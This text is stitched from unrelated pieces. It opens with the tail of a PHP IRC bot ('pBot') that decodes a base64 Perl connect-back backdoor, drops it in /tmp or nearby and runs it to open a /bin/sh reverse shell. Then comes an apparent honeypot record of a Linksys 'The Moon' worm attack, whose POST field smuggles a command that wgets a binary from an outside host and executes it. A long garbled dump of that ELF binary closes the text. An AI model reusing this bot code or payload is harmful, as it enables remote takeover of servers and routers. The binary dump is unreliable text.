$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNr ? IEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0 ? XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4i ? Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQg ? PSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHBy ? b3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZF ? UiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsN ? Cm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAi ? U25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIp ? Ow0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVu ? KFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERF ? UlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBl ?eGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
$bot = new pBot;
$bot->start();
?>
Linksys "The Moon" Worm
[Attack info]
Attacker:
221.213.121.104
Dest. port: 8080
Time: 05/10/2019 15:51:03
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Yunnan, Kunming
Description
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:CVE
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228Author
UnknownPOST /tmUnblock.cgi HTTP/1.1
Content-Length: 227
accept-encoding: gzip, deflate
connection: keep-alive
Accept: */*
User-Agent: python-requests/2.20.0
Host: 192.168.0.14:80
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+wolf.mpsl%3B+wget+http%3A%2F%2F104.244.78.187%2Fbins%2Fwolf.mpsl%3B+chmod+777+wolf.mpsl%3B+.%2Fwolf.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEP
Resource ( 1 / 2 )
MD5: a3e8823f36ad8356086415bb766035cb
Type: application/x-executable
Size: 71996
URL: http://104.244.78.187/bins/wolf.mpsl
ELF��������������`@�4���
���4� ��(��
����������@���@�����������������E��E����P
��������Q�td���������������������������
<
��'!��'���
������������
<葜'!� ��������9' � �����������������
<���'!�
���������9' � �����������
��������� ��'�
<���'!���' ���
�����������������"�����
�@����������� �������Y����� � �B$ � � ������Y������� �B$Ȃ�������@�$
���Ȃ������ � ��$����$�"� ���
��������(��'�
<�'!��'������
��������$�@��$ � �������������������������@�$� �������� ��'��������� ��'����!��������
<4��'!�!���,���������'��$$��' ���ԁ���������������P������� � ������������������������
<Џ�'!���'0���,���(���$��� ���
���������p���!���!������0���0H��� � ��$����P����
�@����0���,���(���$��� ���
��������8��'p������� � ��������P�����@����p������� � ! @�������
������� � �������! @�܂������ � �$�������h������� � ! ������������F��������������������C�������d������������
�Q!(����$������d��������������Q�c$����L���! `!(� � !0�����������
<D��'!��'
������������������������>������������B������������F�����
������J�����������N��
���������R�����������V�����
������Z����� ������^��
���$������b�� ���(������f��$���,������j��(���0������n��,���4������r��0���8������v��4���8���
�������� ��'܂������ � �$������������܂������ � �$�����������܂������ � �$
�����������܂������ � �$��������
���܂������ � �$�����������܂������ � �$�����������܂������ � �$
�����������܂������ � �$ ��������
���܂������ � �$$�������� ���܂������ � �$(��������$���܂������ � �$,��������(���܂������ � �$0��������,���܂������ � �$4��������0���܂������ � �$8��������4���܂������ � �$���8���
�������� ��'�
<4��'!����'T���P���L���H���D���@���<���8���4���0��������,!����@!������$����
�@���$T���P���L���H���D���@���<���8���4���0�����X��'����@(��������������0������$!��+��@��������! � � �$ ���������&!(@�!�D$�$�B���C��R&������������������$!�#"��T$+������$��� �������������耙����� � �������$���������@����
��!�@�!�������1&耙��&�@! @� � ��������������$���耙�T���P���L���H���D���@���<���8���4���0���� X��'��B�����
�@��V0$���t������� � ����������c0���2&���@��6�% ��$���(����*�%(��t��� ���% ����������e0 � !0���������������! � � �$$�����������&��@���&�B�$�����`����P����&*p��@��$$����R&
��!������������b�����"��p�����*p��@���������& � �$���!(@D�����"�! @� � !0���&# p!!�������'���$�r$����$��������
<��'!����0�����0������0
�F��$��[email protected]���b��������c$�%���!(`���!�����������������̂������� �����
<���'!����0�����0������0
�F��$��[email protected]���b��������c$�%���!(`���!�����������������P��������
�$�
<
��'!���'$��� ���
��������������$���� � �$�����%���4�������!�@���D��$�(������ � ��$��$����������!b���$��p���B���$��$ � �$�����%�����!�@�������D��$�(������ � ��$��$����������!b���$��p���B���$��$ � �$�����%�����!�@���D������$�(������ � ��$��$������!b���$��B���p���$�$��� ���
�������$��(��'�
<���'!����'\���X���T���P���L���H���D���@���<���8�������������0d���! @�$!��� � ���0���! @�����$ � !�@����! ȁ��!(��$��4 � !�@������B0ȁ��! !(��$��4 � 0������! ȁ��!(�!0���$ � ��W0���! ȁ��!(��$�$ � ��S0�����4��������
��� ���$���(������!����2���%b�,���c�@����0���d�����b0���%b�!��� ��4���䃙���ď � �$��'���R���1&������4 � �$(������0���������4l���[������4��������"�`����$�$ � !0��(�������c$(�����$��&Ԃ��! @���'�$L�C��¯�$���,���
��� � ����"���� �B,l����@!( �0� � ������<$ ��2�&��.�"�����%e�%���%�!���<$��2�&������%D�%����%��0�䃙���ď!( � �$��'�������1&��@����+��!���!���!!�0�����D���e�!0`�@$ � �1&�����2�&�@���������� � �����������"�\���X���T���P���L���H���D���@���<���8�����`��'l������� � ���������B0o��,���!���!���!���P�����! � � !(`���!�0�����D�!(�!0`�@$ � �1&����2��&��@������������
<ԁ�'!����'\���X���T���P���L���H���D���@���<���8�������������0d���! @�$!��� � ���0���! @�����$ � !�@����! ȁ��!(��$��4 � !�@������B0ȁ��! !(��$��4 � 0������! ȁ��!(�!0���$ � ��W0���! ȁ��!(��$�$ � ��S0�����4��������
��� ���$���(������!����2���%b�,���c�@����0���d�����b0���%b�!��� ��4���䃙���ď � �$��'���R���1&������4 � �$(������0���������4l���[������4��������"�`����$�$ � �$(�������c$(�����$��&Ԃ��! @���'�$L�C��¯�$���,���
��� � ����"���� �B,l����@!( �0� � ������<$ ��2�&��.�"�����%e�%���%�!���<$��2�&������%D�%����%��0�䃙���ď!( � �$��'�������1&��@����+��!���!���!!�0�����D���e�!0`�@$ � �1&�����2�&�@���������� � �����������"�\���X���T���P���L���H���D���@���<���8�����`��'l������� � ���������B0o��,���!���!���!���P�����! � � !(`���!�0�����D�!(�!0`�@$ � �1&����2��&��@������������
<�}�'!�`��'��������������������������������|���x�������������0����! `�$!��� � ���0���!(�ȁ��! �$!8�� � X��������B0ȁ��!(��$��4! � <������!(�ȁ��! �[email protected]�$ � !�@������B0ȁ��!(�! �$�$ � 8��������ȁ���!(��$��4! � 4������!(�ȁ��! �$��4 � !�@����!(�ȁ��! �$��4 � !�@����!(�ȁ��! �$!8�� � T������!(�ȁ��!
�$�$ � P������!(�ȁ��!
�$!8�� � L������!(�ȁ��!
�$!8�� � H������!(�ȁ��! �$!8�� � D������!(�ȁ��! �$!8�� � @������!(�ȁ��! �$!8�� � !�@����!�@�Ђ��������G�!(�! � �$���,���`����$�$ � �$��$���kP!�@������$�$ ������! �!(���$ � ��'���YP���2L�������������2���20�����` ���H���D���T�����0�
[email protected]���0�����b0���2��J0��0��3�O2� 2���2���2��2��"��*��R
�:�B��%0��@K ��[
��b
��j
�@r��z�(���%��%�%�J�\���`���d���h���l���p���!���������$ � �$X���� �! �� ���X��������!f�������p��$���l���$C�@�B4�$$C��B4���<����<$��8�������(���4��������&@�$���$ �� ���,���@���#C�����
��!C��C��
���
����$$F���$��B4$C�\���`���%C���$$C�%F���$$C�d���h���%C���$$C�%F���$$C�l���p���%C���$$C�%F�
����$�$������)�� � (���B0xB$��C0������%C�*���$.��
�$�$l����$/��,�� � -������$0���$�$;��8��4���9��:�� ��������P$*��` �����`���� ���! ����
<��@�����#C�!(P�X�����!b������q� �B,C�@�2&,�����$c��������4g������l������q������T�������w�P����P�������{�p����0�����������������! �$ �
� ����! X���
�"�!(@�($(�$ � �@� ������@!��������E�# ���B�! �������$���<�$������! �!( � �@$ �������d$*����@ �����`������� ���l������ � ���� ���$(
@!���# ������*�! ����2������&���%d�%���%�!�$
��2�&������%D�%�,���%���$�������0�l������� � ��4������
�"�l������� � �����������"�l������� � �����������"�l������� � ��������B�T���������P����l������� � ����P��������p�B�l������� � ����0����������B�l������� � �������|���B������ � ! ������������������������������������|���x��������'��,�@!0���������$��,!0����`��$�$�����0��������!0�����0�!C�$�!D�'�����B0��(
������%�@���[email protected]���������$��([email protected]��`��$�$��������#1 ��� �!C���E1
�!!E��"�!d�!F�!b�<���������B0!G�<��������'�����B0������[email protected]��[email protected]���
<�t�'!�����܂����D�� �$�
<xt�'!���'0���,���(������������$!����! @����
��� ����P$��� � �����������`����$�$ � !0������$&�����$'�P��"� � � ������0������$!0�� � ! ����! �������F4 � �$����#������'���H���c$
�$��$�c,
���䃙���'�$�������`�(��$�"���$� � �������0���,���(�����8��'�
<Hs�'!�x��'������|��x��t��p��l��h��d��`�����p������� � ������!@�����
�`��C�������|��x��t��p��l��h��d��`������'��$�b����$������� � ��$�������Ђ���������� � ��b��������������� � ! ����� $������������ � ��$���[email protected]@����� �������!8��!(��[email protected]�� �@�#d���#C�!E���[email protected]�!H����(��Ѭ�@� �$�`!(��`�����$ ����$�$ � �$���!�@�����P������$!0�� � ! ����! �������F4 � �$��� ��'�D����d������$�$D�� ������!(�� � �$���b@����l������� � ������^0���3��
�%C��B,����@�$������������$$C��B4$P�l����([email protected]�B4��&��� � ��
����$ ����@�$��P��4�$l����_$ ��
�Į�¦ � �������¦
�4��'�B4
�®D�'X�'D��'T��8��<��X�����',��'$��'(��'@��P��H��L������������c��������4��
��� �����$�����$l���4���8���<��� � @��������Ђ��������������
��l������� � �������! ��������� � !�@����! @�
������� � ��2�
���R0�$�����s0�"��� �����4�"&��B0�B,�@8�$�"
�$�"��$��"��$��"d�$��"��$��"��$�"��".�@��"&��B0�B,�@
�$�"�$�"�$�"�$�"
�$�"
�$��"
�$��"!�$��"7�$��"��$��"��$��"������������ � �����U��'����(��#(��@�!e�#(C�����$��<����%d�%P�%C���<$ C���C0�.�"����%D�%e�%C�0��0�����������$�� �
�������X���
�⦼����_$�î!(��$�$�¦ � �������¦��$�Ɩ4����$���������T����������8���6������(�$ � �@$ �������c$��b(^�@ ���4��t������� � !������!�@���<�������d�h���8���������$ � �@$�����@! @�����
�$��b(��,�@����Ђ��T�����������C�$M�������b�_$<���������������b������������^����
��������b0�@�b0�@�b0�@�b0�@�����������$ R���C0�.�"����%e�%D�%C���B$$R���D0�.���"��%C�% ��P��%(D������*b�@� �@�#d���#C�����!P���d�@�! ��������� �` �$��$�&Q�! `��b�������@ c$<��
�����b� �������(
�$ � �����������������D� � �����������h������� � ! ����$�B����1�������B..�@ �B.�@����*������@�B.'�@�B.�@����#��������$�B����
�������B.�@�B.�@��������������<�$=��)</�����
�%b�%p���%C���<
��$ E�����%d�%P�%C���<��$ E�X��@����@��B$��C����8��!`���@��B$��D!���!���!(���� ����$����$����$����������D��B���!E�$�C� ��%d�*(F��$�C�!��� ��������E$���(+�` ���� �@�#d���#C�!E�����@���������!�C����������������������b�������#C��B,�@�������� � ���������$��������$��� � �& �������E$���(�` ����$*Q! @,����`0���! P��\���X��@����$!8�� � ����������������� � ! �����!(������ �������b� ��������E$���(*�` ���� �@�#d�������#C�!E�����@�!�C���D���$�B�D����!C���C��������c0~�`�$D��B���!C�$�C��������c0�`�����B������@�$�B�����I�S�Q&�����F�胙�!�&��D�#0f!(� � �@$���'�@! @�!(�!A�$���������@����������$������������B�����!D�Ă���B��C� � ! ���!R����@����D��B���!d���d��$��% ��*(&W����d�U��!��� �@��$��$�C������$#�b�������D� � ����������� �������(
Y$ � ! @����������̃��! X�E& � ��$�C������c$����C��E
�$��������z�b�$�C������b�������D� � ���������$������C��@�! � �$���g������L������H�����$���(�����4 � $!@�$������
�@����
�`�$�B������C
P&�S������D�k���C����D� � ���������$��D�E���@�����%d�%P�%C���<��$ C�
���������E$ � ! ������������Q� � ! ����[email protected]�0����@$! � !(����! ��������� � �
$����D&�������� � �$���
���S��
<|e�'!�����܂����D�� �$�
<\e�'!��ݽ'l"��h"��d"��`"��\"��X"��T"��P"��L"��H"�����4���9�'���0!(��! � � �$���9�'4���! @�!(���$ � @"�����8��'4���! @!(�� � $�����2��(��'�"���% �$!0����
��� ��� � $���������������� � ! ��$���
C0�$t������� � �$�������t������� � �$�������t������� � �$�������t������� � �$���!(���������� � �$���! @�,������� � !(��!�@���$����b��'����! @�$ � !0`���m�@����8���������`:�$�b!��:�$�c$!C��B������@������D�c$��c$�q$�f$!� �C������` �$�b��$!B! ���� �$�e��$��C���$��`�B$��$!�FĂ��!� �@� � ! ����! �ԃ��!(@� � !0���$����C!(��[email protected]���$&!0D��À!8���`!��� �$sb �$qb�$e�����!8����(�@��$��À��$�`!������!(��!� �C�����
�` �$
�b��$!B�� �$�f������C���$��`�B$!���!�D �@� � ! ��B(�����@!(��������� � ! ������������� � ! `������������� � ! ����:@!(���������� � �$�������������� � ! @����`@!�@�!���T������� � ! ������@! @��������
��������B$��B0
�B,�@
��$�����$ � !(�����!(@��������� � ! �������������� � ! ����!(@�������� � ! �������������� � ! �����$����!(�� � !�@����! ��������� � !(@����@"������! � � �$��$�����C�$�������� � !(�����!(@��������� � ! �������������� � ! ����!(@�������� � ! �������������� � ! �����$����!(�� � !�@����!(@��������� � ! ��������������� � ! ������@!�@�T������� � ! `���!�@�����@"���$u�@��$s������ � ��������$�������� � !(�����!(@��������� � ! �������������� � ! ����!(@�������� � ! �������������� � ! �����$����!(�� � !�@����!(@��������� � ! �������������� � ! ����! �
����������� � ��$������������� � ! ����! ��������� �
�%&���@"������! � � �$���@"��Ă����W���� � �������@"��ԃ��!(@� � !0����
�$P�����W! @ � �
$��� �$܂������ � ! @��������T������� � ! `���!�@�����@"���$��@��$�������� � ! `�������T������� � ! ���� �@! @��������� � ! ���
������p������� � �$�������������� � �$�������������� � �$�������������� � �$���&��!���$���!8��!�!�D�A�$����$&����$����$������� � �$�������������� � �$�������������� � �$�������������� � �$���!���!�l"��h"��d"��`"��\"��X"��T"��P"��L"��H"����p"�'��$K��! ���$6���$(���)���*���+���)���,�����(������!����
<\�'!��'���������������������������������������� � ! ���������p������� � !�@����!@�����
�`��C�����������������������������������'��$�r�_$ā���$��� �
�������_$`�������$�$ � !0������R!�@�Ԃ����'! @� � �$���! �x������� � �$�������ā������ � �$����$`�������$�$ � !0������R!�@�Ԃ����'! @� � �$���! �x������� � �$�������ā������ � �$����$`�������$�$ � !0������R!�@�Ԃ����'! @� � �$���! �x������� � �$�������p������� � �$�������x������� � �$�����@�,���t�����`�$����$ � ��b��������t������� � �$����$�������� � !(�������'������� � !(@��������������� � !�b����(��'��! @� �
�$���! ��������� � !(@�����$����!(�� � !����! ��������� � !(@�������,���!(�� � !�@����Q�R��������� � ! @��������������� � �$�������������� � �$������$���������E� � �$����R!@�$���������������!C���@����!(����! @� � #(��x��'���'���!�`�$!���8��'������t������� � �$���!(���������� � �$�������������� � ! @�����@!�@�������� � �$�������T������� � ! ����"�@! @�
��������B$��B0
�B,�@
��$H������� � ! @!�@�*"����@��&������� � ! ��#P�
�B(���2@�b*T������� � ! ��$����@! @��������� � ! ������������������ � ! ������$t������� � !�@�����$t������� � ��$����$�������� � !(�����! ��������� � !(@����!������! � !(@����$����!(�� � !�@����! 0�������� � !(@�����$�������� � !(���������������� � !(@�������!�b�����!(@ � ! ��� �$����!(�� � !�@����!(@��������� � ! 0�������������� � �$�������������� � �$����������! � � �$���(�V!��������� � �@�����b����
������� � �������
�b����$�������������� � ��������@����!�`V��!��,������ � !(�������V!�@������ � ! ��������,���! � � !(��!�@���$���z�B����t������� � �$�������t������� � �$��������������! @ � �$�����@!�@������$ � !(�����!(�������$ � !�@�������������� � ! @�[email protected]@�*����@!0��! ���$���$!&���
����$��C���������*�C����!0�����$!&��$�����$�����$ � !(�����!(�������$ � !�@��������Ă������ � ! @�[email protected]�*�����@!(�������$��&!%����$��C���������2�C����!(�������$����$��$������� � �$�������������� � �$������������ � ! @���! `܂������ � �$�����������@�$ � ! ��������������� � @�$����$p������� � !�`������!������������$��@��<��B4��������@�!C��������p������� � �$����������������� � �$�������������� � �$������������ � ! @���������܂��! ` � �$���6�������
<�Q�'!�H���܂����D�� �$�
<�Q�'!���'0���,���(������������$!����! @����
��� ����P$��� � �����������`����$�$ � !0������$&�����$'�P��"� � � ������0������$!0�� � ! ����! �������F4 � �$����#�쁂��'���H���c$
�$��$�c,
���䃙���'�$�������`�(��$�"���$� � �������0���,���(�����8��'�
<tP�'!����'|��x��t��p��l��h��d��`��\��X�����p������� � ������!@�H���
�`��C�|��x��t��p��l��h��d��`��\��X������'��$�b����$������� � ��$�������Ђ���������� � ��b��������������� � ! ������
$쁄��������� � �$���[email protected]����� �������!0��!(��! @�����#C���$!G���(�����@��
�$��`!(��`����$ ����$�$ � �$���!�@����bQ��"������$!0�� � ! @����! �������F4 � �$��� ��'���0����D������$�$0�� ������!(�� � �$���?@����l������� � ������^0���3��
�%C��B,����@�$������������$$C��B4$P�l����([email protected]�B4��&��� � ��
����$ ����@�$��l���P��4�$ �$ ��
�Į�¦ � �������¦
�4��'�B4
�®X�'D�'@��H��L��D��'���',��'$��'(��'D��P��<��4��8��쁄�������������������� ���l���4���8���<��� � @��������Ђ��������������
��l������� � �����$���E0>��$�����f0����0��$��$��B0�B,�@8�$�
�$���$�����$���d�$�����$�����$������,�@���$��B0�B,�@
�$���$���$���$��
�$��
�$��
�$��!�$��7�$����$����$���������
�%b�%g���%C�"���C0�.����0���%e�%D�����%C������$�� �
�������X���
�⦼��� �$�î!(��$�$�¦ � �������¦����$�Ɩ4����$���������@����������8���6������(�$ � �@$ �������c$�b(z�@ ���!��t������� � !������!�@���<���������d�h���H���������$ � �@$�����@!@�����
�$��D(�b,�@����Ђ��T�����������C�$M�������b �4L��������#������b�����"������^����
�#������b0�@�b0�@�b0�@�b0�@�����"�����$ R���C0�.�"����%e�%D�%C���B$$R���D0�.���"��%C�% ��P��%(D�����*H�@������������D���#C�! ��������� �`�$�
�$�&:�! `��b�������@�
c$L��
�����b� ��������@�$ � ��������������������� � �����������h������� � ! ����$����G���
���,B�@ ��,�@��@���
�@��,;�@��,��@��9���
���$�����4���
���,/�@��,�@��-���
�D��P����@��B$��Y����H��! ��@��B$��C!���!���! ����$�� ������0��B���!C���C� ��%d�*(&����C�!��� ��������D$��('�` ���������������#C�!�D������������쁙�����"�����#C��B,�@���$�B,�@�$���0��B���!Y�$�C� ��%d�*(F��$�C� ���!����D$��(�` ����$*Q! @,����`0���! <��\���D��P����$!8�� � ����������������� � ! �����! ��쁃� �������b� ��������D$��(n�` ���������������#C�!�D���D���$�B�0����!C���C��������c0~�`�$B�0����!E�$�C��������c0�`�����B������@�$�B�����I�S�Q&�����F�胙�!�&��D�#0f!(� � �@$���'�@! @�!(�!A�$���������@����������$�������쁅��B�����!D�Ă���B��C� � ! ���!R����@����� � ��������&���������� � �$���]������ �@��$��$�C������$#�b�������D� � ����������� ��������@9' � ! @����������̃��! X�E& � �$�C������c$����C��Y
�$��������~�C�$�C������b�������D� � ���������$������B��@�! � �$���k������8������4�����(���$�����4 � $!@�$������
�@����
�`�$�B������CP&�$�D������D�j���C����D� � ���������$��D�H���@�
��������E$ � ! ������������Q� � ! ����[email protected]�0����@$! � !(����! ��������� � �$����$�������� � �D&�����D������ � ����������� ��������@9' � ! @����$���B��
<�C�'!� ���8���\QB$����b��
<�C�'!����'H���D���@���<���8������`����$D����$ ����$ � !0��! @������"���$d���$���� ��'��4�$ � ��������0������$!0�� � ! ����! ����������F4 � �$lc����S�`�����<�C4�$t���$���Yo$(��� � &��������@�Ԃ��$��'��$�!(@�$ � !�@���$���B�C~�$�������F�b����䃙�Yo$��$��$&���!(@�$$��� � (����������p������� � �$�����$������ � �����������ā������ � Yo$������� �������O9' � �����������
���|������� � � &�������|������� � � &���H���D���@���<���8�����P��'Ђ��������C�����$D���x�����D� � �$���������lb�������@����������l@��
<DA�'!���'$��� ���
���������t������� � !�$���!(���������� � !�$����������(��� � ! @����!�$������� � !�@��������l���� �����0� � ������$�������D�
��8���! ����!p���b� � �B�zF$����B�$��� ���
��������(��'�
<[email protected]�'!���'(���$��� ������p������� � �������!@�l����`��C�(���$��� �����0��'��$��q����t����$��� � �$�������t������� � �$�������t������� � �$�������t������� � �$�������t������� � �$�������t������� �
�$�������t������� �
�$�������t������� �
�$�������t������� � �$���!(���������� � �$���! @�,������� � �$����Q!�@��<W�4! � � ��'��������<W�4! � � !0���������p������� �
�$�������������!(�� � �$���! @�,������� � �$!�@���$����!(���������� � �$���! @�,������� � �$!�@���$����!(���������� � �$���! @�,������� � �$!�@���$�����!(���������� � �$���! @�,������� � �$!�@���$�����!(���������� �
�$���! @�,������� � �$!�@���$�����!(���������� �
�$���! @�,������� � �$!�@���$�����!(���������� �
�$���! @�,������� � �$!�@���$�����!(���������� � �$���! @�,������� � �$!�@���$���r������������ � �$�������������� � �$�������������� � �$�������������� � �$�������������� � �$�������������� �
�$�������������� �
�$�������������� �
�$�������������� � �$�������h������� � ! ���
<�;�'!����'D��@��<��8��4��0��,��(��$�� �����܃�����'!���$���! � � !������! �@������� � �$���!0��䀙�!(� � �$����$�������� � �$����$ ����������� � �N�$�������$���Ђ�� � h��'����$(�����¯Y<L�������{B4�$���� � ���������� ���8��� ���\QB$O9' � ��b���������������� � �������! ��������� � �$�$�����"����l������� � �$�������Ă������ � !�@����!�@�Ă������ � #�p���P
�����H��'4���! � ��'���!�" � !( �����������!��(� � � !(���� �$�������� � ! ��������l������� � ����������������� � !�@����!�@������� � #�q�`�S
�����! �4������!� � !(����!������!(��$ � (����������t������� � �$����$�������� � $��'���$���䂙�!(@� � �$����$
���䂙���$ � �$�������������� � �$��������������� � ���������������� � �����������p������� � �������(�@!��D��@��<��8��4��0��,��(��$�� ����H�'Ă����� � ���� �B(���m�@����������� � ! �������Ă������ � ! ����! ��������� � !(@����Z������������� � ��'���! ������� �
������$����� � �'������������ � �$�����������܁�� � ������������������� � ������������������� � ������'�������� � ����������������� � ����0��'(��'���������������@��B$��R����!@��@��B$��S��$D���������E�������B���!V���D��$��% ����D�����܁�����$p���������������c�@�$��������B���!v�hd���% ��hd�!��D���������D�����*���@����! `���\���
�$�����0���4�����[email protected] � !8��!@���$�����b�����`�*<����c4�C��'� �����#d�����@�#C�#����$��`��D���������D���$ ��B���!V���C��������c0��`�$p���������������'�@��������p���B���!v���@�hb�܁�����B0�@��$����������� � �����������p�����0� � �$���}��������������B���!v���d���% ����d����!��������$܁��m��B���!V���C��������c0e�`����t������� � ��������@�胙�����!(��$@$ � !�@������P������@���� �������`��b0���%0b��,��� �������� � �������B������`����$ � !0��!�@����V�P���������$!0�� � ! @����! ������F4 � �$�������8���������y������ ���� � �����������p���䃙�(����$������b� � �$���4������܁��0�����D�!(��$ � �@$���c������,��'�����$�����,���(�����4 � $(������Q�`�������$� � ���������$l������� � ��"���<��c4�C��������p�������� �@�!d�#C� � �D$��������������8��' � (����������������� � ������������������� � �����������H������� � ����������� ������� � ������������������ � ����������������� � �������
��܂��# � � �$�������h������� � ! ��Ă������ � ! ��������$������� � ��������$�
���0�����$�$�@$ � ��¯�����$�0����$!(� � �@$ ���������!(�0�����$� � �@$������������#�
�$��b�$��b����������$����������� � �����������܁��p�����P� � �$���s�������� �胙�����!(` � @$����P�����@!(�胙������$ � �@$ ���������0��2�%0��胙�����!(` ��� � �@$ ������S������聙����� � ! `���L������胙�����!(��$ � �@$���C�������
<�/�'!�������l"�xE��������"��
�&D�&��&C�p�t��&C�l$�p�t���xB��
<|/�'!���' ���
���������������� � ! �������������������� � lb��������
������ � !�@����&� ������� � p0����p#�������&C�x��t�� ���
��������(��'�
<�.�'!����'x���t���p���l���h���d���`���\���X������t���!��� �$ � !������ �$�������� � !(�������'����!(@� � ! @���$��!�����������������x��l��
���&�&��&pt����&�Ă��t��l�pŮx�� � ! @�@�
�������!C��b�������"��1&�3����������� � �$���x���t���p���l���h���d���`���\���X��������'�
<|-�'!�[email protected]��'��!P��������������x'�t
�p�lƍ ���
$��C���%�J%��!0`!X�!`��!8`����,�&��&(��&(e��)�! `��@&e�
�
&����C���%���J%x#�t�p�l˭���������
�&��&��&C��&C�l˭p�t�x"�����B��
<�,�'!�����܂����D�� �$�
<p,�'!���'0���,���(������������$!����! @����
��� ����P$��� � �����������`����$�$ � !0������$&����8$'�P��"� � � ������0������$!0�� � ! ����! �������F4 � �$����#�d����'���H���c$
�$��$�c,
���䃙���'�$�������`�(��$�"���$� � �������0���,���(�����8��'�
<@+�'!����'|��x��t��p��l��h��d��`��\��X�����p������� � ������!@�����
�`��C�|��x��t��p��l��h��d��`��\��X������'��$�b����$������� � ��$�������Ђ���������� � ��b��������������� � ! �����h+$d����������� � �$���[email protected]����� �������! ��!0��!(@���@�#C�!D���#D���#b���$��!g���(����d+���`�h+�$�@! ��`����$ ����$�$ � �$���!�@�쀇�zQ�������$!0�� � ! @����! �������F4 � �$��� ��'쀂�4����D������$�$4�� ������!(�� � �$���W@����l������� � ������B0��C00�����%C��B,����@�$������������$$C��B4$P�l����([email protected]�B4��� � ������������������c$
�d���$$ �����P��4�[email protected]�$��� ���΅$
����0��l������� � ������4��'����D�'�c$�b�
�b�X�'�B4
�b�D��L��P��D��'���',��'$��'(��'H��T��@��8��<��d���������P������������ ���l���4���8���<��� � @����������Ђ�������������
���l������� � �����$���E0>��$�����f0����0��$��$��B0�B,�@8�$�
�$���$�����$���d�$�����$�����$������,�@���$��B0�B,�@
�$���$���$���$��
�$��
�$��
�$��!�$��7�$����$����$���������
�%b�%g���%C�"���C0�.����0���%e�%D���������%C����
��� � �$����$����X���
����$��! �����΅$�$������������ � �$�����������쀇���$���������������$���$4����$���D������8���6������(�$ � �@$ �������c$b(r�@ ���!��t������� � !������!�@���<쀃������d�h���L���������$ � �@$�����@! @����
�$��b(��,�@����Ђ��T�����������C�$M�������b΅4P���������������b�������0�������G����
��������b0�@�b0�@�b0�@�b0�@�����������$ R���C0�.�"����%e�%D�%C���B$$R���D0�.���"��%C�% ��P��%(D�����*N�@��@�#C�!P���#P���#b���������D�����! ��������� �@h+�$�$�&:�! `��b�������@h+c$P��
�����b� �������0f�$ � �������������쀅������ � �����������h������� � ! ����$�����8���
���,3�@ ��,�@��1���
�@��,,�@��,�@��*���
���$����%���
���, �@��,�@��
���
